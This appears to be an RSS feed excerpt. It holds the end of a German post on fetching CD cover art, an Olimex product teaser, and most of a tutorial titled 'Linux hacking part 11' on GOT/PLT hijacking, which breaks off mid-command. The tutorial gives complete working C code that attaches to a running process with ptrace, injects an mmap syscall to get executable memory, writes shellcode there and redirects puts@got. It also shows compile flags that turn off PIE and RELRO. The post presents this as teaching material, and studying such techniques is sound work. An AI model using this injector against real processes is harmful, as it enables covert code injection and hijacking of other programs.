Coverbildern&lt;/h3&gt;&lt;p&gt;Die von cyanrip automatisch heruntergeladenen Coverbilder aus dem Netz sind leider oft Grütze. Fast immer tausche ich sie beim Taggen noch durch eigene Scans oder anderweitiges Bildmaterial aus, das man im Netz finden kann.&lt;/p&gt;&lt;p&gt;Ein Tipp, mit dem man hervorragende Cover-Bilder bekommt: Gewünschtes Album bei YouTube-Music suchen (Beispiel: &lt;a href=&quot;https://music.youtube.com/playlist?list=OLAK5uy_mIR9MPZBqQgMhHBW5spUX2jw0Ky7zGOqI&quot;&gt;Klee – Jelängerjelieber&lt;/a&gt;), Rechtsklick aufs Cover-Bild → „Grafik in neuem Tab öffnen“, dann die &lt;a href=&quot;https://yt3.googleusercontent.com/FWKdXW7qTJ5i_FuLA1DW8-KhSJY4XCMW5kXiDjIuvOSv22UDONRLNnhn-aihkW5MnITJVsAEuCym72SZ=w544-h544-l90-rj&quot;&gt;URL des Bildes&lt;/a&gt; anpassen. Ganz hinten in der Bild-URL befindet sich ein Parameter wie &lt;code&gt;=w544-h544-l90-rj&lt;/code&gt;. Den kann man auf &lt;code&gt;=w8000&lt;/code&gt; ändern und man erhält eine &lt;a href=&quot;https://yt3.googleusercontent.com/FWKdXW7qTJ5i_FuLA1DW8-KhSJY4XCMW5kXiDjIuvOSv22UDONRLNnhn-aihkW5MnITJVsAEuCym72SZ=w8000&quot;&gt;große Version des CD-Covers&lt;/a&gt;. Die speichere ich mir als &lt;code&gt;cover.jpg&lt;/code&gt; im Album-Ordner und, je nach Größe der Bilddatei eventuell leicht herunterskaliert, in den FLAC-Files.&lt;/p&gt;&lt;p&gt;Viel Spaß beim Archivieren!&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;04.06.2026: Erstveröffentlichung&lt;/li&gt;
&lt;li&gt;Update 07.06.2026: Verfeinerten Befehl hinzugefügt, der Mehrfach-CDs berücksichtigt.&lt;/li&gt;
&lt;li&gt;Update 08.06.2026: Verschiedene Szenarien für die Ermittlung des MusicBrainz-Releases hinzugefügt, Sanitize-Parameter und den Rest leicht überarbeitet.&lt;/li&gt;
&lt;/ul&gt;</content:encoded>
</item>
<item>
<title>Introducing the LCD7-PANEL-LIME2: A Ready-to-Mount Linux Touch Panel Computer</title>
<link>https://olimex.wordpress.com/2026/06/17/introducing-the-lcd7-panel-lime2-a-ready-to-mount-linux-touch-panel-computer/</link>
<guid isPermaLink="false">EFd7ycFglDyiW_HeKERPJzgw0ZabVdTPdOO17w==</guid>
<pubDate>Sat, 20 Jun 2026 13:49:14 +0000</pubDate>
<description>If you’ve ever needed a complete, industrial-grade touchscreen computer that you can simply bolt onto a panel and power up, the LCD7-PANEL-LIME2 is built exactly for that job. What it is The LCD7-PANEL-LIME2 is a fully assembled all-in-one unit that combines four things Olimex usually sells separately into a single, ready-to-deploy package: Everything arrives assembled, […]</description>
<content:encoded>If you’ve ever needed a complete, industrial-grade touchscreen computer that you can simply bolt onto a panel and power up, the LCD7-PANEL-LIME2 is built exactly for that job. What it is The LCD7-PANEL-LIME2 is a fully assembled all-in-one unit that combines four things Olimex usually sells separately into a single, ready-to-deploy package: Everything arrives assembled, […]</content:encoded>
</item>
<item>
<title>Linux hacking part 11: GOT/PLT hijacking. Simple C example. - cocomelonc</title>
<link>https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html</link>
<enclosure type="image/jpeg" length="0" url="https://cocomelonc.github.io/assets/images/206/2026-06-17_07-26.png"></enclosure>
<guid isPermaLink="false">FAH1RdXhzPV-oulmej0UMnWiltpex9Cp41d95A==</guid>
<pubDate>Sat, 20 Jun 2026 08:44:36 +0000</pubDate>
<description>﷽</description>
<content:encoded>&lt;p&gt;﷽&lt;/p&gt;&lt;p&gt;Hello, cybersecurity enthusiasts and white hackers!&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-26.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;This post is based on an exercise for my students and readers.&lt;/p&gt;&lt;p&gt;In the &lt;a href=&quot;https://cocomelonc.github.io/linux/2026/03/12/linux-hacking-10.html&quot;&gt;previous post&lt;/a&gt; we explored shared library injection via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LD_PRELOAD&lt;/code&gt;. Today we go one level deeper: instead of loading a new library, we surgically patch a pointer inside a running process to redirect one specific function call. No new files on disk, no &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LD_PRELOAD&lt;/code&gt;, just a few bytes overwritten at the right address.&lt;/p&gt;&lt;h3&gt;concept&lt;/h3&gt;&lt;p&gt;When a Linux binary calls an external function like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt;, the call does not go directly to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;. Instead it passes through two structures baked into the ELF binary itself.&lt;/p&gt;&lt;p&gt;&lt;em&gt;PLT - Procedure Linkage Table.&lt;/em&gt; - a small table of stubs in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.plt&lt;/code&gt; section. Each stub is three instructions:&lt;/p&gt;&lt;p&gt;&lt;em&gt;GOT - Global Offset Table.&lt;/em&gt; - a writeable array of pointers in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.got.plt&lt;/code&gt;. Before the first call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt;, the GOT entry points back into the PLT (to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;push&lt;/code&gt; instruction above). On the &lt;em&gt;first&lt;/em&gt; call the dynamic linker resolves the real libc address and writes it into the GOT. Every subsequent call skips the resolver and jumps straight to libc. This is called &lt;em&gt;lazy binding&lt;/em&gt;.&lt;/p&gt;&lt;h3&gt;practical example&lt;/h3&gt;&lt;p&gt;The attack surface is obvious: the GOT is a writeable table of function pointers. If we overwrite the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entry with our own address, every future call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; in the victim will land in our code instead of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The technique in four steps:&lt;/p&gt;&lt;p&gt;attach to the victim with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ptrace&lt;/code&gt; so we can read and write its memory.  &lt;br/&gt;
parse the victim’s ELF binary to locate the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entry in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.got.plt&lt;/code&gt;.   &lt;br/&gt;
inject a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mmap&lt;/code&gt; syscall into the victim to allocate a page of executable memory, then write our hook shellcode there.   &lt;br/&gt;
overwrite the GOT entry with the address of the shellcode and detach.&lt;/p&gt;&lt;p&gt;Let’s start from victim. The victim is intentionally minimal - it just announces its &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PID&lt;/code&gt; and prints &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;meow&amp;quot;&lt;/code&gt; in a loop so we can clearly see the moment the hook takes effect (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meow.c&lt;/code&gt;):&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * meow.c
 * simple target process for GOT/PLT hijacking demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

int main(void) {
  printf(&amp;quot;victim pid: %d\n&amp;quot;, getpid());
  while (1) {
    puts(&amp;quot;meow&amp;quot;);
    sleep(2);
  }
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Now the interesting part. Let me walk through &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hack.c&lt;/code&gt; (our hijacker) section by section.&lt;/p&gt;&lt;p&gt;First we need to &lt;em&gt;hook shellcode&lt;/em&gt; - our hook replaces &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entirely. It calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;write(1, &amp;quot;[HOOKED] meow\n&amp;quot;, 14)&lt;/code&gt; directly via syscall (avoiding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;) and then returns to the caller. The string is appended at the end of the shellcode and addressed with a RIP-relative &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;lea&lt;/code&gt;:&lt;/p&gt;&lt;p&gt;In C:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static unsigned char hook_sc[] = {
  0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,     /* mov rax, 1            */
  0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,     /* mov rdi, 1            */
  0x48, 0x8d, 0x35, 0x0a, 0x00, 0x00, 0x00,     /* lea rsi, [rip+0x0a]   */
  0x48, 0xc7, 0xc2, 0x0e, 0x00, 0x00, 0x00,     /* mov rdx, 14           */
  0x0f, 0x05,                                   /* syscall               */
  0xc3,                                         /* ret                   */
  &amp;#39;[&amp;#39;,&amp;#39;H&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;K&amp;#39;,&amp;#39;E&amp;#39;,&amp;#39;D&amp;#39;,&amp;#39;]&amp;#39;,&amp;#39; &amp;#39;,&amp;#39;m&amp;#39;,&amp;#39;e&amp;#39;,&amp;#39;o&amp;#39;,&amp;#39;w&amp;#39;,&amp;#39;\n&amp;#39;
};&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Next, &lt;em&gt;writing to victim memory&lt;/em&gt; - we need a helper that writes an arbitrary byte buffer into the victim’s address space in 8-byte chunks using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PTRACE_POKEDATA&lt;/code&gt;. The last chunk (if the buffer is not a multiple of 8) uses a read-modify-write to avoid corrupting adjacent bytes:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static void poke_bytes(pid_t pid, uint64_t addr, void *data, size_t len) {
  size_t i;
  for (i = 0; i + 8 &amp;lt;= len; i += 8) {
    uint64_t word;
    memcpy(&amp;amp;word, (uint8_t *)data + i, 8);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
  if (i &amp;lt; len) {
    uint64_t word = ptrace(PTRACE_PEEKDATA, pid, addr + i, NULL);
    memcpy(&amp;amp;word, (uint8_t *)data + i, len - i);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;at the next step we need &lt;em&gt;syscall injection.&lt;/em&gt; - we need to allocate a page of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PROT_READ|PROT_WRITE|PROT_EXEC&lt;/code&gt; memory inside the victim. The trick: save the victim’s registers and the current instruction at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RIP&lt;/code&gt;, overwrite those two bytes with a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;syscall&lt;/code&gt; opcode (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x0f 0x05&lt;/code&gt;), set the registers to describe a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mmap&lt;/code&gt; call, single-step one instruction, then read &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RAX&lt;/code&gt; for the returned address and restore everything:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static uint64_t inject_mmap(pid_t pid) {
  struct user_regs_struct regs, saved;
  uint64_t saved_instr;

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;saved);
  regs = saved;

  // save the 8 bytes at RIP and patch the first two to `syscall`
  saved_instr = ptrace(PTRACE_PEEKTEXT, pid, saved.rip, NULL);
  ptrace(PTRACE_POKETEXT, pid, saved.rip,
    (saved_instr &amp;amp; ~(uint64_t)0xffff) | 0x050f);

  // mmap(NULL, 4096, PROT_RWX, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
  regs.rax = 9;            /* SYS_mmap                  */
  regs.rdi = 0;            /* addr   = NULL             */
  regs.rsi = 4096;         /* length = 4096             */
  regs.rdx = 7;            /* PROT_READ|PROT_WRITE|PROT_EXEC */
  regs.r10 = 0x22;         /* MAP_PRIVATE|MAP_ANONYMOUS */
  regs.r8  = (uint64_t)-1; /* fd     = -1               */
  regs.r9  = 0;            /* offset = 0                */
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;regs);

  ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
  waitpid(pid, NULL, 0);

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;regs);
  uint64_t page = regs.rax;

  // restore original instruction and register state
  ptrace(PTRACE_POKETEXT, pid, saved.rip, saved_instr);
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;saved);

  return page;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;after detaching the victim resumes exactly where it was, as if nothing happened - except there is now a new anonymous page in its address space containing our shellcode.&lt;/p&gt;&lt;p&gt;Next step. We need to &lt;em&gt;finding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts@got&lt;/code&gt;.&lt;/em&gt; - we open &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/proc/&amp;lt;pid&amp;gt;/exe&lt;/code&gt; (the actual ELF on disk), read it into a buffer, then walk the section headers looking for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.dynsym&lt;/code&gt;, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.dynstr&lt;/code&gt;. Each entry in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt; pairs a GOT slot address (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r_offset&lt;/code&gt;) with a dynamic symbol index. We match the symbol name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;puts&amp;quot;&lt;/code&gt; and return &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r_offset&lt;/code&gt;. For a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-no-pie&lt;/code&gt; binary this is the absolute virtual address:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static uint64_t find_puts_got(pid_t pid) {
  char path[64];
  snprintf(path, sizeof(path), &amp;quot;/proc/%d/exe&amp;quot;, pid);
  int fd = open(path, O_RDONLY);
  if (fd &amp;lt; 0) { perror(&amp;quot;open exe&amp;quot;); return 0; }

  uint8_t *buf = NULL;
  size_t sz = 0;
  uint8_t tmp[4096];
  ssize_t n;
  while ((n = read(fd, tmp, sizeof(tmp))) &amp;gt; 0) {
    buf = realloc(buf, sz + n);
    memcpy(buf + sz, tmp, n);
    sz += n;
  }
  close(fd);

  Elf64_Ehdr *ehdr   = (Elf64_Ehdr *)buf;
  Elf64_Shdr *shdrs  = (Elf64_Shdr *)(buf + ehdr-&amp;gt;e_shoff);
  char *shstrtab     = (char *)(buf + shdrs[ehdr-&amp;gt;e_shstrndx].sh_offset);

  Elf64_Shdr *rela_plt = NULL, *dynsym_s = NULL, *dynstr_s = NULL;
  for (int i = 0; i &amp;lt; ehdr-&amp;gt;e_shnum; i++) {
    char *name = shstrtab + shdrs[i].sh_name;
    if (!strcmp(name, &amp;quot;.rela.plt&amp;quot;)) rela_plt = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynsym&amp;quot;))   dynsym_s  = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynstr&amp;quot;))   dynstr_s  = &amp;amp;shdrs[i];
  }

  if (!rela_plt || !dynsym_s || !dynstr_s) {
    fprintf(stderr, &amp;quot;required ELF sections not found\n&amp;quot;);
    free(buf); return 0;
  }

  Elf64_Rela *relas  = (Elf64_Rela *)(buf + rela_plt-&amp;gt;sh_offset);
  int         count  = rela_plt-&amp;gt;sh_size / sizeof(Elf64_Rela);
  Elf64_Sym  *syms   = (Elf64_Sym  *)(buf + dynsym_s-&amp;gt;sh_offset);
  char       *strtab = (char       *)(buf + dynstr_s-&amp;gt;sh_offset);

  uint64_t addr = 0;
  for (int i = 0; i &amp;lt; count; i++) {
    uint32_t idx = ELF64_R_SYM(relas[i].r_info);
    if (!strcmp(strtab + syms[idx].st_name, &amp;quot;puts&amp;quot;)) {
      addr = relas[i].r_offset;
      break;
    }
  }

  free(buf);
  return addr;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Finally, &lt;em&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main&lt;/code&gt; - putting it all together.&lt;/em&gt; - attach, find the GOT entry, inject mmap, write shellcode, overwrite GOT, detach:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;int main(int argc, char *argv[]) {
  if (argc &amp;lt; 2) {
    fprintf(stderr, &amp;quot;usage: %s &amp;lt;pid&amp;gt;\n&amp;quot;, argv[0]);
    return 1;
  }
  pid_t pid = (pid_t)atoi(argv[1]);

  printf(&amp;quot;attaching to pid %d...\n&amp;quot;, pid);
  if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) &amp;lt; 0) {
    perror(&amp;quot;ptrace attach&amp;quot;); return 1;
  }
  waitpid(pid, NULL, 0);
  printf(&amp;quot;attached\n&amp;quot;);

  uint64_t got_puts = find_puts_got(pid);
  if (!got_puts) {
    fprintf(stderr, &amp;quot;puts@got not found\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;puts@got: 0x%lx\n&amp;quot;, got_puts);

  printf(&amp;quot;injecting mmap syscall...\n&amp;quot;);
  uint64_t page = inject_mmap(pid);
  if ((int64_t)page &amp;lt; 0) {
    fprintf(stderr, &amp;quot;mmap failed\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;rwx page allocated: 0x%lx\n&amp;quot;, page);

  printf(&amp;quot;writing hook shellcode...\n&amp;quot;);
  poke_bytes(pid, page, hook_sc, sizeof(hook_sc));
  printf(&amp;quot;%zu bytes written\n&amp;quot;, sizeof(hook_sc));

  printf(&amp;quot;overwriting puts@got...\n&amp;quot;);
  ptrace(PTRACE_POKEDATA, pid, got_puts, page);
  printf(&amp;quot;puts@got -&amp;gt; 0x%lx\n&amp;quot;, page);

  ptrace(PTRACE_DETACH, pid, NULL, NULL);
  printf(&amp;quot;detached. victim is now hooked!\n&amp;quot;);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;So, full source code of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meow. c&lt;/code&gt;:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * meow.c
 * simple target process for GOT/PLT hijacking demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

int main(void) {
  printf(&amp;quot;victim pid: %d\n&amp;quot;, getpid());
  while (1) {
    puts(&amp;quot;meow&amp;quot;);
    sleep(2);
  }
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Full source code of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hack.c&lt;/code&gt;:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * hack.c
 * GOT/PLT hijacking: attaches to a running process via ptrace,
 * injects an rwx page, writes hook shellcode, overwrites puts@got
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;elf.h&amp;gt;
#include &amp;lt;sys/ptrace.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;sys/wait.h&amp;gt;
#include &amp;lt;sys/user.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;

/*
 * hook shellcode: write(1, &amp;quot;[HOOKED] meow\n&amp;quot;, 14) + ret
 * the string is appended at the end, addressed via rip-relative lea
 *
 * layout:
 *   0x00  mov rax, 1      (7 bytes)
 *   0x07  mov rdi, 1      (7 bytes)
 *   0x0e  lea rsi, [rip+0x0a] (7 bytes, RIP after = 0x15)
 *   0x15  mov rdx, 14     (7 bytes)
 *   0x1c  syscall        (2 bytes)
 *   0x1e  ret          (1 byte)
 *   0x1f  &amp;quot;[HOOKED] meow\n&amp;quot;   (14 bytes)
 */
static unsigned char hook_sc[] = {
  0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
  0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
  0x48, 0x8d, 0x35, 0x0a, 0x00, 0x00, 0x00,
  0x48, 0xc7, 0xc2, 0x0e, 0x00, 0x00, 0x00,
  0x0f, 0x05,
  0xc3,
  &amp;#39;[&amp;#39;,&amp;#39;H&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;K&amp;#39;,&amp;#39;E&amp;#39;,&amp;#39;D&amp;#39;,&amp;#39;]&amp;#39;,&amp;#39; &amp;#39;,&amp;#39;m&amp;#39;,&amp;#39;e&amp;#39;,&amp;#39;o&amp;#39;,&amp;#39;w&amp;#39;,&amp;#39;\n&amp;#39;
};

/* write len bytes of data into the tracee at addr, 8 bytes at a time */
static void poke_bytes(pid_t pid, uint64_t addr, void *data, size_t len) {
  size_t i;
  for (i = 0; i + 8 &amp;lt;= len; i += 8) {
    uint64_t word;
    memcpy(&amp;amp;word, (uint8_t *)data + i, 8);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
  if (i &amp;lt; len) {
    /* read-modify-write for the last partial chunk */
    uint64_t word = ptrace(PTRACE_PEEKDATA, pid, addr + i, NULL);
    memcpy(&amp;amp;word, (uint8_t *)data + i, len - i);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
}

/*
 * inject a mmap(NULL,4096,PROT_RWX,MAP_PRIVATE|MAP_ANON,-1,0) syscall
 * into the tracee by patching two bytes at RIP to 0f 05 (syscall),
 * single-stepping, then restoring registers and the original instruction
 */
static uint64_t inject_mmap(pid_t pid) {
  struct user_regs_struct regs, saved;
  uint64_t saved_instr;

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;saved);
  regs = saved;

  saved_instr = ptrace(PTRACE_PEEKTEXT, pid, saved.rip, NULL);
  ptrace(PTRACE_POKETEXT, pid, saved.rip,
       (saved_instr &amp;amp; ~(uint64_t)0xffff) | 0x050f);

  regs.rax = 9;
  regs.rdi = 0;
  regs.rsi = 4096;
  regs.rdx = 7;
  regs.r10 = 0x22;
  regs.r8  = (uint64_t)-1;
  regs.r9  = 0;
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;regs);

  ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
  waitpid(pid, NULL, 0);

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;regs);
  uint64_t page = regs.rax;

  ptrace(PTRACE_POKETEXT, pid, saved.rip, saved_instr);
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;saved);

  return page;
}

/* parse /proc/&amp;lt;pid&amp;gt;/exe and return the virtual address of puts@got */
static uint64_t find_puts_got(pid_t pid) {
  char path[64];
  snprintf(path, sizeof(path), &amp;quot;/proc/%d/exe&amp;quot;, pid);
  int fd = open(path, O_RDONLY);
  if (fd &amp;lt; 0) { perror(&amp;quot;open exe&amp;quot;); return 0; }

  uint8_t *buf = NULL;
  size_t sz = 0;
  uint8_t tmp[4096];
  ssize_t n;
  while ((n = read(fd, tmp, sizeof(tmp))) &amp;gt; 0) {
    buf = realloc(buf, sz + n);
    memcpy(buf + sz, tmp, n);
    sz += n;
  }
  close(fd);

  Elf64_Ehdr *ehdr   = (Elf64_Ehdr *)buf;
  Elf64_Shdr *shdrs  = (Elf64_Shdr *)(buf + ehdr-&amp;gt;e_shoff);
  char *shstrtab   = (char *)(buf + shdrs[ehdr-&amp;gt;e_shstrndx].sh_offset);

  Elf64_Shdr *rela_plt = NULL, *dynsym_s = NULL, *dynstr_s = NULL;
  for (int i = 0; i &amp;lt; ehdr-&amp;gt;e_shnum; i++) {
    char *name = shstrtab + shdrs[i].sh_name;
    if (!strcmp(name, &amp;quot;.rela.plt&amp;quot;)) rela_plt = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynsym&amp;quot;))   dynsym_s  = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynstr&amp;quot;))   dynstr_s  = &amp;amp;shdrs[i];
  }

  if (!rela_plt || !dynsym_s || !dynstr_s) {
    fprintf(stderr, &amp;quot;required ELF sections not found\n&amp;quot;);
    free(buf); return 0;
  }

  Elf64_Rela *relas  = (Elf64_Rela *)(buf + rela_plt-&amp;gt;sh_offset);
  int     count  = rela_plt-&amp;gt;sh_size / sizeof(Elf64_Rela);
  Elf64_Sym  *syms   = (Elf64_Sym  *)(buf + dynsym_s-&amp;gt;sh_offset);
  char     *strtab = (char     *)(buf + dynstr_s-&amp;gt;sh_offset);

  uint64_t addr = 0;
  for (int i = 0; i &amp;lt; count; i++) {
    uint32_t idx = ELF64_R_SYM(relas[i].r_info);
    if (!strcmp(strtab + syms[idx].st_name, &amp;quot;puts&amp;quot;)) {
      addr = relas[i].r_offset;
      break;
    }
  }

  free(buf);
  return addr;
}

int main(int argc, char *argv[]) {
  if (argc &amp;lt; 2) {
    fprintf(stderr, &amp;quot;usage: %s &amp;lt;pid&amp;gt;\n&amp;quot;, argv[0]);
    return 1;
  }
  pid_t pid = (pid_t)atoi(argv[1]);

  printf(&amp;quot;attaching to pid %d...\n&amp;quot;, pid);
  if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) &amp;lt; 0) {
    perror(&amp;quot;ptrace attach&amp;quot;); return 1;
  }
  waitpid(pid, NULL, 0);
  printf(&amp;quot;attached\n&amp;quot;);

  uint64_t got_puts = find_puts_got(pid);
  if (!got_puts) {
    fprintf(stderr, &amp;quot;puts@got not found\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;puts@got: 0x%lx\n&amp;quot;, got_puts);

  printf(&amp;quot;injecting mmap syscall...\n&amp;quot;);
  uint64_t page = inject_mmap(pid);
  if ((int64_t)page &amp;lt; 0) {
    fprintf(stderr, &amp;quot;mmap failed\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;rwx page allocated: 0x%lx\n&amp;quot;, page);

  printf(&amp;quot;writing hook shellcode...\n&amp;quot;);
  poke_bytes(pid, page, hook_sc, sizeof(hook_sc));
  printf(&amp;quot;%zu bytes written\n&amp;quot;, sizeof(hook_sc));

  printf(&amp;quot;overwriting puts@got...\n&amp;quot;);
  ptrace(PTRACE_POKEDATA, pid, got_puts, page);
  printf(&amp;quot;puts@got -&amp;gt; 0x%lx\n&amp;quot;, page);

  ptrace(PTRACE_DETACH, pid, NULL, NULL);
  printf(&amp;quot;detached. victim is now hooked!\n&amp;quot;);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;demo&lt;/h3&gt;&lt;p&gt;First, compile the victim with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-no-pie&lt;/code&gt; (fixed addresses make the GOT entry address absolute, exactly what &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt; stores) and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-z norelro&lt;/code&gt; (keeps the GOT writable):&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;gcc -no-pie -z norelro -o meow meow.c&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-23.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Run it in a first terminal and note the PID it prints:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;./meow&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-24_1.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Compile the hijacker:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;gcc -o hack 